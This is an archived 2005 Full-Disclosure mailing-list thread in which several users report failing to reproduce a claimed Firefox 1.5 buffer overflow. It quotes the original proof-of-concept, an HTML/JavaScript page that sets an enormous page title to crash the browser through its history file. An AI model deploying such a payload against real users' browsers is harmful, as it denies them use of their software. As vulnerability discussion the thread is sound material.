lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <bac86c710512081151m321eaf6ch67ccfa85d85c7b46@mail.gmail.com>
Date: Thu Dec  8 19:51:55 2005
From: paranoidgeek at gmail.com (Matt)
Subject: re: Firefox 1.5 buffer overflow (poc)

Didn't work here, just made the system go a bit sluggish for a moment, as
you would expect when dealing with a 2.5  million character string.

Firefox :
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051130 Firefox/1.5
Built with :
gcc version 3.4.4 (Gentoo 3.4.4-r1, ssp-3.4.4-1.0, pie-8.7.8)
Window manager:
KDE 3.5.0

Possibly it is crashing the Windows API ?

--
Matt


On 12/9/05, Ron <iago@...hallalegends.com> wrote:
>
> I was also unable to replicate it, on Firefox 1.5 i386 Linux EN
>
> ad@...poverflow.com wrote:
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > nor a fake , nor you really dont know what is a buffer overflow, but for
> > sure here on my firefox 1.5 EN, the client is much longuer to load to
> > the next boot but it reloads fine without exceptions and there is
> > nothing about a security bug here...
> >
> >
> >> <!-- Firefox 1.5 buffer overflow
> >>
> >> Basically firefox logs all kinda of URL data in it's history.dat file,
> >> this little script will set a really large topic and Firefox will then
> >> save that topic into it's history.dat.. The next time that firefox is
> >> opened, it will instantly crash due to a buffer overflow -- this will
> >> happen everytime until you manually delete the history.dat file --
> >which
> >> most users won't figure out.
> >>
> >> this proof of concept will only prevent someone from reopening
> >> their browser after being exploited. DoS if you will. however, code
> >> execution is possible with some modifcations.
> >>
> >> Tested with Firefox 1.5 on Windows XP SP2.
> >>
> >> ZIPLOCK <sickbeatz@...il.com>
> >>
> >> -->
> >> <html><head><title>heh</title><script type="text/javascript">
> >> function ex() {
> >>      var buffer = "";
> >>      for (var i = 0; i < 5000; i++) {
> >>              buffer += "A";
> >>      }
> >>      var buffer2 = buffer;
> >>      for (i = 0; i < 500; i++) {
> >>              buffer2 += buffer;
> >>      }
> >>      document.title = buffer2;
> >> }
> >> </script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
> >> </a></body></html>
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1.4.2 (MingW32)
> >
> > iQIVAwUBQ5g3Jq+LRXunxpxfAQIg5RAAsMXisNDN9AcLiWf9F7nsoKhT6uaULAw+
> > 4omnQUjuaRvxAIYRwKNC1nC+zl8qzmUsL4Extkd52mn7OkTrprd1MUE09CoshSlX
> > Nq9N62bJ4zqRsdrum1NQhc358scTWNKCmWWXtSGNqu4fGnvpljyeYRACGeC6UD/v
> > DDbikg09XOO+GffIAf4la63f+SV63+laZ6TkmX2jxBdw1LBN0mMCBLo0IPY5K78m
> > /Cu2SCIqvs00ih6olLp9f8/3p9SgiK2+D9UiTnw3F3f2mYR5r7uGilYL9PNQPmKE
> > crCnfKCYxi/4P03rnIuja9LNloQWkBTsOhOfe5716NlQ/KZAz/IpfTw7yS6sdn22
> > cxUpAE5zQqfI7jI0cD3yozmSksMyyEBLojAtsn2ECFOKpQQgkoOgaQX+dnrT+EYo
> > pr2qquUKH/GXHGeT9od57cUkC/Jaf7qcaSkF6/LJ+13yHcsuDH0KcsMCYDP6aGN3
> > 5R4/c6MAGFWKblMzdksWe+qqCDgm1yeM7MBbHGYyL6PMnfSldJBD29kGceLc47hi
> > AVJaVmmDb3Nc/fo93gmqUT/x+mMItyk8+4dH0HOzEjRfI0qedeD+1uusS97ThVEw
> > 2KG1o/1vlLPsnailmtHbj8sj/iawQvQRR/Phvk2Noz8bTQSEkDuThtE+zr2ZEjvb
> > IFxjTMn8Sc0=
> > =SX09
> > -----END PGP SIGNATURE-----
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051209/a6c30959/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ